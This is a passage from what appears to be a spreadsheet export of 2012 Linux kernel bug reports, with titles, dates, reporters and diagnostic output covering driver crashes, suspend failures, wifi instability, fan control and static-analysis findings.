rpc_pipefs (rw) admin@evil ~ $ ls -l /bin/su -rws--x--x 1 root root 35088 Jul 20 22:49 /bin/su admin@evil ~ $ cat /bin/su cat: /bin/su: Permission denied admin@evil ~ $ su - Password: evil ~ # exit logout admin@evil ~ $</t>
  </si>
  <si>
    <t>Regression: ATI video card doesn't power down after elapsed time</t>
  </si>
  <si>
    <t>2012-10-19 20:41 UTC</t>
  </si>
  <si>
    <t>Joseph D. Wagner</t>
  </si>
  <si>
    <t>Created attachment 84051 [details] System Information In 3.5.7, my ATI video card would power down after the elapsed time set in GNOME screensaver. It does not power down in 3.6.1. The only change was the kernel. Booting into the previous version resolves the issue. See attachment for system information.</t>
  </si>
  <si>
    <t>NULL pointer dereference in pata_acpi</t>
  </si>
  <si>
    <t>2012-10-20 10:19 UTC</t>
  </si>
  <si>
    <t>Just upgraded from 3.2.20 to 3.6.2 and when I try to boot a get BUG unable to handle kernel NULL pointer dereference at 00000010 IP [&lt;efe4c2407&gt;] pacpi_set_dmamode+0x50/0xa0 [pata_acpi] and it wont find my hard disc. I'm using the standard arch linux kernel config available at https://projects.archlinux.org/svntogit/packages.git/tree/trunk/config?h=packages/linux I've attached a couple of photos of the message and backtrace</t>
  </si>
  <si>
    <t>168c:0032 Wifi connection unstable -- Atheros AR9485 ath9k</t>
  </si>
  <si>
    <t>3.7 and previous</t>
  </si>
  <si>
    <t>2012-10-21 16:29 UTC</t>
  </si>
  <si>
    <t>gfmichaud</t>
  </si>
  <si>
    <t>2015-10-31 10:14 UTC</t>
  </si>
  <si>
    <t>55171 55901</t>
  </si>
  <si>
    <t>Wifi connection with an Atheros AR9485 card is very unstable (bad quality, and very bad range). At the beginning connection quality stays where it reasonably should be, but after few seconds it drops to poor values : :~$ sudo iwconfig lo no wireless extensions. wlan0 IEEE 802.11bgn ESSID:"Pluff" Mode:Managed Frequency:2.412 GHz Access Point: 94:0C:6D:C5:8B:B4 Bit Rate=54 Mb/s Tx-Power=15 dBm Retry long limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=46/70 Signal level=-64 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:4 Missed beacon:0 ...... :~$ sudo iwconfig lo no wireless extensions. wlan0 IEEE 802.11bgn ESSID:"Pluff" Mode:Managed Frequency:2.412 GHz Access Point: 94:0C:6D:C5:8B:B4 Retry long limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off Bit Rate=54 Mb/s Tx-Power=15 dBm Link Quality=28/70 Signal level=-82 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:4 Missed beacon:0 --- --- --- --- --- --- --- --- --- This was tested on (cat /proc/version) : - Linux version 3.5.0-17-generic (buildd@allspice) (gcc version 4.7.2 (Ubuntu/Linaro 4.7.2-2ubuntu1) ) #28-Ubuntu SMP Tue Oct 9 19:31:23 UTC 2012 which is the standard Ubuntu 12.10 kernel and - Linux version 3.7.0-999-generic (apw@gomeisa) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #201210210405 SMP Sun Oct 21 08:05:46 UTC 2012 which is the latest upstream kernel The exact name of the network card is (lspci) : 02:00.0 Network controller: Atheros Communications Inc. AR9485 Wireless Network Adapter (rev 01) --- --- --- --- --- --- --- --- --- This bug is related to Ubuntu Launchpad bug n°971809. https://bugs.launchpad.net/ubuntu/+source/linux/+bug/971809</t>
  </si>
  <si>
    <t>3.7-rc6</t>
  </si>
  <si>
    <t>2012-10-22 09:44 UTC</t>
  </si>
  <si>
    <t>Yeping Yang</t>
  </si>
  <si>
    <t>2013-11-20 19:34 UTC</t>
  </si>
  <si>
    <t>Vulnerability kind: Null-pointer dereference The file path containing this vulnerability: tools/firewire/nosy-dump.c Line number: 183 Severity: medium Code fragment (from line 182 to line 183): t = malloc(sizeof *t); t-&gt;request_node = request_node; Description: The variable "t" is defined at line 182 via function "malloc" but is not sanity-checked.Then it is dereferenced at line 183.</t>
  </si>
  <si>
    <t>2012-10-22 09:47 UTC</t>
  </si>
  <si>
    <t>2013-11-20 19:37 UTC</t>
  </si>
  <si>
    <t>Linux kernel version: 3.0.47 Vulnerability kind: Null-pointer dereference The file path containing this vulnerability: tools/firewire/nosy-dump.c Line number: 153 Severity: medium Code fragment (from line 152 to line 153): sa = malloc(sizeof *sa - sizeof sa-&gt;packet + length); sa-&gt;ack = data[length / 4 - 1]; Description: The variable "sa" is defined at line 152 via function "malloc" but is not sanity-checked.Then it is dereferenced at line 153.</t>
  </si>
  <si>
    <t>Resume from suspend fails for sda</t>
  </si>
  <si>
    <t>3.6rc1-3.6.6</t>
  </si>
  <si>
    <t>2012-10-22 19:49 UTC</t>
  </si>
  <si>
    <t>Dimitris Damigos</t>
  </si>
  <si>
    <t>I have Arch install on a Sony VAIO VPCCW1S1E. After upgrade to 3.6.2 kernel resume from suspend doesn't work. It seems that the hard disk fails to resume and I get input/output errors. Up to 3.5.6 resume worked fine. I have attached dmesg and lspci output.</t>
  </si>
  <si>
    <t>iwl3945/iwlegacy ad-hoc mode crash after waking from hibernation</t>
  </si>
  <si>
    <t>3.6.3</t>
  </si>
  <si>
    <t>2012-10-24 10:32 UTC</t>
  </si>
  <si>
    <t>2013-06-21 15:10 UTC</t>
  </si>
  <si>
    <t>Created attachment 84621 [details] iwlegace backtrace I'm using Nokia N9 phone as wireless access point in ad-hoc mode and connecting a Thinkpad T60 to it. $ iwconfig wlan0 wlan0 IEEE 802.11abg ESSID:"Ffhugrhgjdcjffegff" Mode:Ad-Hoc Frequency:2.412 GHz Cell: 9E:F5:E0:EC:60:94 Tx-Power=15 dBm Retry long limit:7 RTS thr:off Fragment thr:off Power Management:off Thinkpad T60 wlan chip: 03:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG [Golan] Network Connection (rev 02) Subsystem: Intel Corporation ThinkPad R60e/X60s Flags: bus master, fast devsel, latency 0, IRQ 46 Memory at edf00000 (32-bit, non-prefetchable) [size=4K] Capabilities: &lt;access denied&gt; Kernel driver in use: iwl3945 After waking up from suspend, the Thinkpad quite reliably crashes with a long backtrace. Unfortunately the trace is too long for console and seems need Gnome3 desktop and X to trigger. Trying "echo disk &gt; /sys/power/state" and wget from console does not trigger this so reliably. I have a video with 3.5.7 kernel and printk_delay set to 100 but I'll try to process it since it's too big atm. Following screenshots show the end of the backtrace on 3.6.3.</t>
  </si>
  <si>
    <t>Backlight hotkeys do not trigger scancodes on Asus A8F laptop</t>
  </si>
  <si>
    <t>3.2.0-32-generic-pae</t>
  </si>
  <si>
    <t>2012-10-24 19:39 UTC</t>
  </si>
  <si>
    <t>Donatas G.</t>
  </si>
  <si>
    <t>2013-03-13 06:36 UTC</t>
  </si>
  <si>
    <t>Created attachment 84691 [details] lspci output I have an issue with the backlight controls on my Asus A8F laptop. I can change the brightness with the Fn-keys (Fn+F5/F6 in particular). However, when changing the brightness with the Fn-keys, no event is triggered in KDE/X and hence the brightness slider doesn't get adjusted. I tried monitoring events with xev, but nothing is triggered when I press the Fn-brightness keys (F5 and F6). Other Fn-keys do trigger events in xev. Same goes for udev monitoring using sudo /lib/udev/keymap -i input/event6 - no scancodes from those two combinations. Nothing is logged in the dmesg when I do these manipulations. But I can monitor what happens when I press the keys with acpi_listen: $acpi_listen [starting from total bright: press Fn+F5] hotkey ATKD 0000002e 00000023 hotkey ATKD 0000002d 0000001f hotkey ATKD 0000002c 0000001e hotkey ATKD 0000002b 0000001d hotkey ATKD 0000002a 0000001b hotkey ATKD 00000029 00000018 hotkey ATKD 00000028 00000017 hotkey ATKD 00000027 00000017 hotkey ATKD 00000026 00000017 hotkey ATKD 00000025 00000015 hotkey ATKD 00000024 00000016 hotkey ATKD 00000023 00000010 hotkey ATKD 00000022 0000000f hotkey ATKD 00000021 0000000e hotkey ATKD 00000020 00000055 [nearly total dark now: press Fn+F6] hotkey ATKD 00000011 0000000d hotkey ATKD 00000012 0000000e hotkey ATKD 00000013 0000000f hotkey ATKD 00000014 00000010 hotkey ATKD 00000015 00000017 hotkey ATKD 00000016 00000015 hotkey ATKD 00000017 00000017 hotkey ATKD 00000018 00000017 hotkey ATKD 00000019 00000017 hotkey ATKD 0000001a 00000018 hotkey ATKD 0000001b 0000001b hotkey ATKD 0000001c 0000001d hotkey ATKD 0000001d 0000001e hotkey ATKD 0000001e 0000001f hotkey ATKD 0000001f 000001c0 [total bright again] I have also tried this with a newever kernel (on live USB, Kubuntu 12.10), but there the problem exists as well. Please let me know how I can help to fix this bug.</t>
  </si>
  <si>
    <t>Missing Check the value of wl-&gt;state in function wl1271_debugfs_update_stats()</t>
  </si>
  <si>
    <t>2012-11-01 09:18 UTC</t>
  </si>
  <si>
    <t>RUC_Soft_Sec</t>
  </si>
  <si>
    <t>2013-11-19 22:26 UTC</t>
  </si>
  <si>
    <t>When the state of device wl1271 is WL1271_STATE_OFF, operations on it shall not be executed, but in function wl1271_debugfs_update_stats(), the device’s state is not checked before the operation wl1271_ps_elp_wakeup() is executed, which may result in errors. The related code snippets are as following. wl1271_debugfs_update_stats @@ drivers/net/wireless/wl12xx/debugfs.c:96 96 static void wl1271_debugfs_update_stats(struct wl1271 *wl) 97 { 98 int ret; 99 100 mutex_lock(&amp;wl-&gt;mutex); 101 102 ret = wl1271_ps_elp_wakeup(wl); 103 if (ret &lt; 0) 104 goto out; Generally, the state of device wl1271 is checked before wl1271_ps_elp_wakeup is called. Take wl1271_op_ampdu_action(), a function in file drivers/net/wireless/wl12xx/main.c, for example. wl1271_op_ampdu_action @@ drivers/net/wireless/wl12xx/main.c:2855 2855 struct wl1271 *wl = hw-&gt;priv; 2856 int ret; 2857 2858 mutex_lock(&amp;wl-&gt;mutex); 2859 2860 if (unlikely(wl-&gt;state == WL1271_STATE_OFF)) { 2861 ret = -EAGAIN; 2862 goto out; 2863 } 2864 2865 ret = wl1271_ps_elp_wakeup(wl); 2866 if (ret &lt; 0) 2867 goto out; Thanks RUC_Soft_Sec</t>
  </si>
  <si>
    <t>fan is actually on while ACPI shows it is off - HP NW9440</t>
  </si>
  <si>
    <t>3.6.5</t>
  </si>
  <si>
    <t>2012-11-04 11:13 UTC</t>
  </si>
  <si>
    <t>2014-11-23 12:56 UTC</t>
  </si>
  <si>
    <t>The fan of my laptop spinns full speed after a while when it is not under any load. To reproduce this the following conditions have to be met: 1. let the laptop enter the lowest fan speed. This is fan off when running on battery or the lowest speed when running on ac. 2. Do nothing on the laptop. Just let it sit there. After a while the fan starts spinning full speed. This is not always the case. Sometimes the laptop works for days before I get this bug again. Perhaps it is important to know that the laptop even under heavy load does not engage full fan speed. The last but one speed is sufficient to cool this machine. The laptop is a HP Compaq NW9440 EY612EA#ABD. It has a nvidia quadro fx1500m graphics chip. Problem is that the system shares one cooling system for cpu and graphics card. I can only observe this bug when the nvidia binary blob is enabled because no other driver lets the system reach the lowest possible fan speed. With the nouveau driver the fan speed is two steps faster when ideling. The latest kernel version without this bug is 2.6.31. After this kernel all kernels have the bug under the same conditions. Latest tested version is 3.6.5. I have tried to bisect this but ran into a dead end because sometimes the nvidia driver would not work and other times the bisected kernel crashed my computer. Because this problem is so annoying I kindly ask you to give me a hint where to look to get rid of this problem. Furthermore I did this 'echo disable &gt; /sys/class/thermal/thermal_zone0/mode' for each thermal zone. But it did not help. Neither did the playing with the acpi_osi parameter nor fixing the two bugs of the DSDT table. Output of acpi -V: Battery 0: Unknown, 99% Battery 0: design capacity 3978 mAh, last full capacity 3978 mAh = 100% Adapter 0: on-line Thermal 0: ok, 20.0 degrees C Thermal 0: trip point 0 switches to mode critical at temperature 110.0 degrees C Thermal 1: ok, 35.0 degrees C Thermal 1: trip point 0 switches to mode critical at temperature 102.0 degrees C Thermal 1: trip point 1 switches to mode passive at temperature 60.0 degrees C Thermal 2: ok, 42.0 degrees C Thermal 2: trip point 0 switches to mode critical at temperature 105.0 degrees C Thermal 2: trip point 1 switches to mode passive at temperature 95.0 degrees C Thermal 3: ok, 50.0 degrees C Thermal 3: trip point 0 switches to mode critical at temperature 126.0 degrees C Thermal 3: trip point 1 switches to mode active at temperature 95.0 degrees C Thermal 3: trip point 2 switches to mode active at temperature 86.0 degrees C Thermal 3: trip point 3 switches to mode active at temperature 74.0 degrees C Thermal 3: trip point 4 switches to mode active at temperature 67.0 degrees C Thermal 4: ok, 44.0 degrees C Thermal 4: trip point 0 switches to mode critical at temperature 102.0 degrees C Thermal 4: trip point 1 switches to mode passive at temperature 97.0 degrees C Thermal 5: ok, 48.0 degrees C Thermal 5: trip point 0 switches to mode critical at temperature 256.0 degrees C Thermal 5: trip point 1 switches to mode active at temperature 91.0 degrees C Thermal 5: trip point 2 switches to mode active at temperature 85.0 degrees C Thermal 5: trip point 3 switches to mode active at temperature 79.0 degrees C Thermal 5: trip point 4 switches to mode active at temperature 68.0 degrees C Cooling 0: Processor 0 of 10 Cooling 1: Processor 0 of 10 Cooling 2: Fan 0 of 1 Cooling 3: Fan 0 of 1 Cooling 4: Fan 0 of 1 Cooling 5: Fan 0 of 1 Cooling 6: Fan 0 of 1 Cooling 7: Fan 0 of 1 Cooling 8: Fan 0 of 1 Cooling 9: Fan 0 of 1 Cooling 10: Fan 0 of 1 Cooling 11: Fan 0 of 1 Cooling 12: Fan 0 of 1 Interesting thing is when the bug occurs there is no active thermal zone or fan visible in acpi -V. I tried to get help from HP for this but they said I should use Windows!? I know my kernel is tainted but I hope to get some hints as to where I can look and what I can try to get rid of this bug. I even tried to replace all of the acpi drivers with the old ones. But since I am no programmer it failed to compile. Any help is greatly appreciated. Some information: cat /proc/version: Linux version 3.6.5 (root@LAPPI) (gcc version 4.5.4 (Gentoo 4.5.4 p1.0, pie-0.4.7) ) #1 SMP PREEMPT Fri Nov 2 12:21:16 CET 2012 Kernel without this bug: 2.6.31 Environment: Gentoo Linux AMD64 stable /usr/src/linux/scripts/ver_linux If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux LAPPI 3.6.5 #1 SMP PREEMPT Fri Nov 2 12:21:16 CET 2012 x86_64 Intel(R) Core(TM)2 CPU T7400 @ 2.16GHz GenuineIntel GNU/Linux Gnu C 4.5.4 Gnu make 3.82 binutils 2.22 util-linux 2.21.2 mount support module-init-tools 3.16 e2fsprogs 1.42 Linux C Library 2.15 Dynamic linker (ldd) 2.15 Procps 3.2.8 Net-tools 1.60_p20110409135728 Kbd 1.15.3wip Sh-utils 8.16 wireless-tools 29 Modules Loaded usblp usb_storage firewire_sbp2 tifm_sd mmc_core xt_LOG xt_limit xt_tcpudp nf_conntrack_ipv4 nf_defrag_ipv4 xt_state nf_conntrack iptable_filter ip_tables x_tables squashfs hid_logitech hid_generic usbhid hid nvidia snd_hda_codec_analog arc4 uhci_hcd ehci_hcd snd_hda_intel snd_hda_codec snd_pcm usbcore snd_timer snd iwl3945 iwlegacy mac80211 cfg80211 tg3 sr_mod soundcore cdrom hp_accel rfkill firewire_ohci lis3lv02d snd_page_alloc usb_common agpgart libphy ata_piix firewire_core wmi input_polldev tifm_7xx1 i2c_core tifm_core cat /proc/modules usblp 10919 0 - Live 0xffffffffa0104000 usb_storage 45352 0 - Live 0xffffffffa01cd000 firewire_sbp2 12513 0 - Live 0xffffffffa0158000 tifm_sd 8970 0 - Live 0xffffffffa00cc000 mmc_core 73103 1 tifm_sd, Live 0xffffffffa01b2000 xt_LOG 7279 1 - Live 0xffffffffa0085000 xt_limit 1865 2 - Live 0xffffffffa0071000 xt_tcpudp 2423 4 - Live 0xffffffffa0052000 nf_conntrack_ipv4 5966 4 - Live 0xffffffffa0062000 nf_defrag_ipv4 1195 1 nf_conntrack_ipv4, Live 0xffffffffa0046000 xt_state 1151 4 - Live 0xffffffffa001c000 nf_conntrack 48873 2 nf_conntrack_ipv4,xt_state, Live 0xffffffffa013e000 iptable_filter 1136 1 - Live 0xffffffffa0013000 ip_tables 15712 1 iptable_filter, Live 0xffffffffa005d000 x_tables 15811 6 xt_LOG,xt_limit,xt_tcpudp,xt_state,iptable_filter,ip_tables, Live 0xffffffffa002d000 squashfs 22566 1 - Live 0xffffffffa0056000 hid_logitech 8133 0 - Live 0xffffffffa0ee9000 hid_generic 1033 0 - Live 0xffffffffa0ee5000 usbhid 26046 0 - Live 0xffffffffa0ed9000 hid 57699 3 hid_logitech,hid_generic,usbhid, Live 0xffffffffa0eb1000 nvidia 11208150 32 - Live 0xffffffffa034d000 (PO) snd_hda_codec_analog 77036 1 - Live 0xffffffffa0334000 arc4 1885 2 - Live 0xffffffffa0330000 uhci_hcd 22603 0 - Live 0xffffffffa0308000 ehci_hcd 40135 0 - Live 0xffffffffa02bd000 snd_hda_intel 22512 7 - Live 0xffffffffa02b1000 snd_hda_codec 72988 2 snd_hda_codec_analog,snd_hda_intel, Live 0xffffffffa0295000 snd_pcm 69421 4 snd_hda_intel,snd_hda_codec, Live 0xffffffffa027b000 usbcore 134688 5 usblp,usb_storage,usbhid,uhci_hcd,ehci_hcd, Live 0xffffffffa0190000 snd_timer 17937 3 snd_pcm, Live 0xffffffffa0187000 snd 46967 15 snd_hda_codec_analog,snd_hda_intel,snd_hda_codec,snd_pcm,snd_timer, Live 0xffffffffa0173000 iwl3945 51825 0 - Live 0xffffffffa015f000 iwlegacy 45088 1 iwl3945, Live 0xffffffffa014b000 mac80211 215736 2 iwl3945,iwlegacy, Live 0xffffffffa0108000 cfg80211 170987 3 iwl3945,iwlegacy,mac80211, Live 0xffffffffa00d2000 tg3 136938 0 - Live 0xffffffffa00a9000 sr_mod 13167 0 - Live 0xffffffffa00a1000 soundcore 864 1 snd, Live 0xffffffffa009d000 cdrom 34525 1 sr_mod, Live 0xffffffffa0090000 hp_accel 16248 0 - Live 0xffffffffa0089000 rfkill 14839 1 cfg80211, Live 0xffffffffa0080000 firewire_ohci 31212 0 - Live 0xffffffffa0074000 lis3lv02d 9964 1 hp_accel, Live 0xffffffffa006d000 snd_page_alloc 6657 2 snd_hda_intel,snd_pcm, Live 0xffffffffa0068000 usb_common 801 1 usbcore, Live 0xffffffffa0054000 agpgart 25617 1 nvidia, Live 0xffffffffa0048000 libphy 18536 1 tg3, Live 0xffffffffa003e000 ata_piix 22391 0 - Live 0xffffffffa0033000 firewire_core 50755 2 firewire_sbp2,firewire_ohci, Live 0xffffffffa001f000 wmi 8075 0 - Live 0xffffffffa0019000 input_polldev 2514 1 lis3lv02d, Live 0xffffffffa0015000 tifm_7xx1 4242 0 - Live 0xffffffffa0010000 i2c_core 18184 1 nvidia, Live 0xffffffffa0006000 tifm_core 4639 2 tifm_sd,tifm_7xx1, Live 0xffffffffa0000000 cat /proc/ioports 0000-0cf7 : PCI Bus 0000:00 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-0060 : keyboard 0062-0062 : EC data 0064-0064 : keyboard 0066-0066 : EC cmd 0070-0071 : rtc0 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : 0000:00:1f.1 0170-0177 : ata_piix 01f0-01f7 : 0000:00:1f.1 01f0-01f7 : ata_piix 0376-0376 : 0000:00:1f.1 0376-0376 : ata_piix 03c0-03df : vga+ 03f6-03f6 : 0000:00:1f.1 03f6-03f6 : ata_piix 04d0-04d1 : pnp 00:0b 0500-057f : pnp 00:09 0800-080f : pnp 00:09 0cf8-0cff : PCI conf1 0d00-ffff : PCI Bus 0000:00 1000-107f : 0000:00:1f.0 1000-107f : pnp 00:0b 1000-1003 : ACPI PM1a_EVT_BLK 1004-1005 : ACPI PM1a_CNT_BLK 1008-100b : ACPI PM_TMR 1010-1015 : ACPI CPU throttle 1020-1020 : ACPI PM2_CNT_BLK 1028-102f : ACPI GPE0_BLK 1100-113f : 0000:00:1f.0 1100-113f : pnp 00:0b 1200-121f : pnp 00:0b 1370-1377 : 0000:00:1f.2 1370-1377 : ahci 13f0-13f7 : 0000:00:1f.2 13f0-13f7 : ahci 1574-1577 : 0000:00:1f.2 1574-1577 : ahci 15f4-15f7 : 0000:00:1f.2 15f4-15f7 : ahci 2000-2fff : PCI Bus 0000:08 3000-3fff : PCI Bus 0000:10 4000-4fff : PCI Bus 0000:01 4000-407f : 0000:01:00.0 5000-501f : 0000:00:1d.0 5000-501f : uhci_hcd 5020-503f : 0000:00:1d.1 5020-503f : uhci_hcd 5040-505f : 0000:00:1d.2 5040-505f : uhci_hcd 5060-507f : 0000:00:1d.3 5060-507f : uhci_hcd 5080-508f : 0000:00:1f.1 5080-508f : ata_piix 50b0-50bf : 0000:00:1f.2 50b0-50bf : ahci 6000-6fff : PCI Bus 0000:02 6000-60ff : PCI CardBus 0000:03 6400-64ff : PCI CardBus 0000:03 cat /proc/iomem 00000000-00000fff : reserved 00001000-0009fbff : System RAM 0009fc00-0009ffff : reserved 000a0000-000bffff : PCI Bus 0000:00 000c0000-000cdbff : Video ROM 000cdc00-000cffff : pnp 00:0c 000d0000-000dffff : PCI Bus 0000:00 000e0000-000fffff : reserved 000f0000-000fffff : System ROM 00100000-d7fcffff : System RAM 01000000-0138705a : Kernel code 0138705b-014ef8bf : Kernel data 01567000-015f2fff : Kernel bss d7fd0000-d7fe55ff : reserved d7fe5600-d7ff7fff : ACPI Non-volatile Storage d7ff8000-d7ffffff : reserved d8000000-fedfffff : PCI Bus 0000:00 d8000000-dbffffff : PCI Bus 0000:02 d8000000-dbffffff : PCI CardBus 0000:03 dc000000-dc1fffff : PCI Bus 0000:08 dc200000-dc3fffff : PCI Bus 0000:10 e0000000-efffffff : PCI Bus 0000:01 e0000000-efffffff : 0000:01:00.0 f0000000-f3ffffff : PCI CardBus 0000:03 f4000000-f40fffff : PCI Bus 0000:10 f4000000-f4000fff : 0000:10:00.0 f4000000-f4000fff : iwl3945 f4100000-f41fffff : PCI Bus 0000:08 f4100000-f410ffff : 0000:08:00.0 f4100000-f410ffff : tg3 f4200000-f45fffff : PCI Bus 0000:02 f4200000-f4200fff : 0000:02:06.0 f4201000-f42017ff : 0000:02:06.1 f4201000-f42017ff : firewire_ohci f4204000-f4207fff : 0000:02:06.1 f4208000-f4208fff : 0000:02:06.2 f4208000-f4208fff : tifm_7xx1 f4209000-f42090ff : 0000:02:06.3 f420a000-f420afff : 0000:02:06.4 f420b000-f420bfff : 0000:02:06.4 f5000000-f6ffffff : PCI Bus 0000:01 f5000000-f5ffffff : 0000:01:00.0 f5000000-f5ffffff : nvidia f6000000-f6ffffff : 0000:01:00.0 f7000000-f7003fff : 0000:00:1b.0 f7000000-f7003fff : ICH HD audio f7004000-f70043ff : 0000:00:1d.7 f7004000-f70043ff : ehci_hcd f7005000-f70053ff : 0000:00:1f.2 f7005000-f70053ff : ahci f8000000-fbffffff : PCI MMCONFIG 0000 [bus 00-3f] f8000000-fbffffff : pnp 00:0b fec00000-fec00fff : reserved fec00000-fec003ff : IOAPIC 0 fed00000-fed003ff : HPET 0 fed20000-fed9afff : reserved fed20000-fed3ffff : pnp 00:0b fed45000-fed8ffff : pnp 00:0b fed90000-fed9afff : pnp 00:0b feda0000-fedbffff : reserved feda0000-fedbffff : pnp 00:0c fee00000-fee00fff : Local APIC fee00000-fee00fff : reserved fee00000-fee00fff : pnp 00:0c fee01000-ffffffff : PCI Bus 0000:00 ffb00000-ffbfffff : reserved ffb00000-ffbfffff : pnp 00:09 fff00000-ffffffff : reserved fff00000-ffffffff : pnp 00:09</t>
  </si>
  <si>
    <t>sony-laptop module Kernel OOPS</t>
  </si>
  <si>
    <t>&gt;= 3.5.x</t>
  </si>
  <si>
    <t>2012-11-05 19:59 UTC</t>
  </si>
  <si>
    <t>Salvatore Cristofaro</t>
  </si>
  <si>
    <t>2013-11-19 18:53 UTC</t>
  </si>
  <si>
    <t>Hello, After upgrade to 3.5.x kernel, suspend stop to work. Looking on dmesg, I obtain this kernel OPS: --- CUT --- [...] [ 35.333632] lp: driver loaded but no devices found [ 35.571221] wmi: Mapper loaded [ 35.576770] ACPI Warning: 0x0000000000000460-0x000000000000047f SystemIO conflicts with Region \PMIO 1 (20120320/utaddress-251) [ 35.576774] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 35.576775] lpc_ich: Resource conflict(s) found affecting iTCO_wdt [ 35.576782] ACPI Warning: 0x0000000000000428-0x000000000000042f SystemIO conflicts with Region \PMIO 1 (20120320/utaddress-251) [ 35.576788] ACPI Warning: 0x0000000000000428-0x000000000000042f SystemIO conflicts with Region \_SB_.PCI0.IEIT.SGPE 2 (20120320/utaddress-251) [ 35.576789] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 35.576796] ACPI Warning: 0x0000000000000500-0x000000000000057f SystemIO conflicts with Region \GPIO 1 (20120320/utaddress-251) [ 35.576798] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver [ 35.576799] lpc_ich: Resource conflict(s) found affecting gpio_ich [ 35.649026] sony_laptop: Sony Notebook Control Driver v0.6 [ 35.751202] microcode: CPU0 sig=0x20652, pf=0x10, revision=0xc [ 35.755192] evbug: Connected device: input0 (Power Button at PNP0C0C/button/input0) [ 35.755197] evbug: Connected device: input1 (Lid Switch at PNP0C0D/button/input0) [ 35.755199] evbug: Connected device: input2 (Power Button at LNXPWRBN/button/input0) [ 35.755202] evbug: Connected device: input3 (AT Translated Set 2 keyboard at isa0060/serio0/input0) [ 35.790263] BUG: unable to handle kernel paging request at 0000000000ff1000 [ 35.790313] IP: [&lt;ffffffff8132a77d&gt;] memcpy+0xd/0x110 [ 35.790340] PGD 1290a7067 PUD 107c9b067 PMD 0 [ 35.790360] Oops: 0000 [#1] SMP [ 35.790376] CPU 3 [ 35.790394] Modules linked in: evbug microcode(+) sony_laptop(+) mac_hid lpc_ich wmi lp parport vesafb video firewire_ohci firewire_core atl1c sdhci_pci sdhci crc_itu_t [ 35.790460] [ 35.790470] Pid: 628, comm: modprobe Not tainted 3.5.0-1-generic #1-Ubuntu Sony Corporation VPCS12L9E/VAIO [ 35.790516] RIP: 0010:[&lt;ffffffff8132a77d&gt;] [&lt;ffffffff8132a77d&gt;] memcpy+0xd/0x110 [ 35.790547] RSP: 0000:ffff880107d45c50 EFLAGS: 00010246 [ 35.790570] RAX: ffff880107d45ca0 RBX: ffff8801290245e0 RCX: 0000000000000001 [ 35.790600] RDX: 0000000000000000 RSI: 0000000000ff1000 RDI: ffff880107d45ca0 [ 35.790630] RBP: ffff880107d45c68 R08: ffff880107c26e00 R09: 0000000180400019 [ 35.790660] R10: 0000000000000000 R11: ffffffff813a1ae9 R12: ffff880107d45ca0 [ 35.790689] R13: ffff880107d45cbf R14: ffff88012c9b0400 R15: 0000000000000135 [ 35.790720] FS: 00007fdd03db6700(0000) GS:ffff880137cc0000(0000) knlGS:0000000000000000 [ 35.790754] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b [ 35.790778] CR2: 0000000000ff1000 CR3: 0000000107c15000 CR4: 00000000000007e0 [ 35.790807] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 35.790837] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 35.790867] Process modprobe (pid: 628, threadinfo ffff880107d44000, task ffff88012c89ae00) [ 35.790901] Stack: [ 35.790913] ffffffffa0087833 0000000000000009 0000000000000035 ffff880107d45cf8 [ 35.790945] ffffffffa0088a49 ffff880131ff3be0 ffff88012e1df800 ffff880107d45c90 [ 35.790977] ffff880100000000 0000000000000009 0000000000000000 0000000000000000 [ 35.791008] Call Trace: [ 35.791025] [&lt;ffffffffa0087833&gt;] ? sony_nc_buffer_call.constprop.12+0x43/0xa0 [sony_laptop] [ 35.791066] [&lt;ffffffffa0088a49&gt;] sony_nc_function_setup+0x2f9/0xab0 [sony_laptop] [ 35.791105] [&lt;ffffffffa00893d8&gt;] sony_nc_add+0x1d8/0x620 [sony_laptop] [ 35.791136] [&lt;ffffffff81387ee9&gt;] acpi_device_probe+0x50/0x11d [ 35.791168] [&lt;ffffffff8141328e&gt;] driver_probe_device+0x7e/0x220 [ 35.791195] [&lt;ffffffff814134db&gt;] __driver_attach+0xab/0xb0 [ 35.791219] [&lt;ffffffff81413430&gt;] ? driver_probe_device+0x220/0x220 [ 35.791249] [&lt;ffffffff81411555&gt;] bus_for_each_dev+0x55/0x90 [ 35.791274] [&lt;ffffffffa0094000&gt;] ? 0xffffffffa0093fff [ 35.791297] [&lt;ffffffff81412c9e&gt;] driver_attach+0x1e/0x20 [ 35.791322] [&lt;ffffffff81412958&gt;] bus_add_driver+0x198/0x270 [ 35.791347] [&lt;ffffffffa0094000&gt;] ? 0xffffffffa0093fff [ 35.791370] [&lt;ffffffff81413ba7&gt;] driver_register+0x77/0x150 [ 35.791398] [&lt;ffffffff8152a0c3&gt;] ? dmi_matches+0x53/0xc0 [ 35.791421] [&lt;ffffffffa0094000&gt;] ? 0xffffffffa0093fff [ 35.791445] [&lt;ffffffff81388649&gt;] acpi_bus_register_driver+0x3e/0x47 [ 35.791474] [&lt;ffffffffa0094057&gt;] sony_laptop_init+0x57/0x1000 [sony_laptop] [ 35.791507] [&lt;ffffffff8100212a&gt;] do_one_initcall+0x12a/0x180 [ 35.791534] [&lt;ffffffff810b4e62&gt;] sys_init_module+0xc2/0x230 [ 35.792862] [&lt;ffffffff8167c3e9&gt;] system_call_fastpath+0x16/0x1b [ 35.794194] Code: 2b 43 50 88 43 4e 48 83 c4 08 5b 5d c3 90 e8 eb fb ff ff eb e6 90 90 90 90 90 90 90 90 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 &lt;f3&gt; 48 a5 89 d1 f3 a4 c3 20 4c 8b 06 4c 8b 4e 08 4c 8b 56 10 4c [ 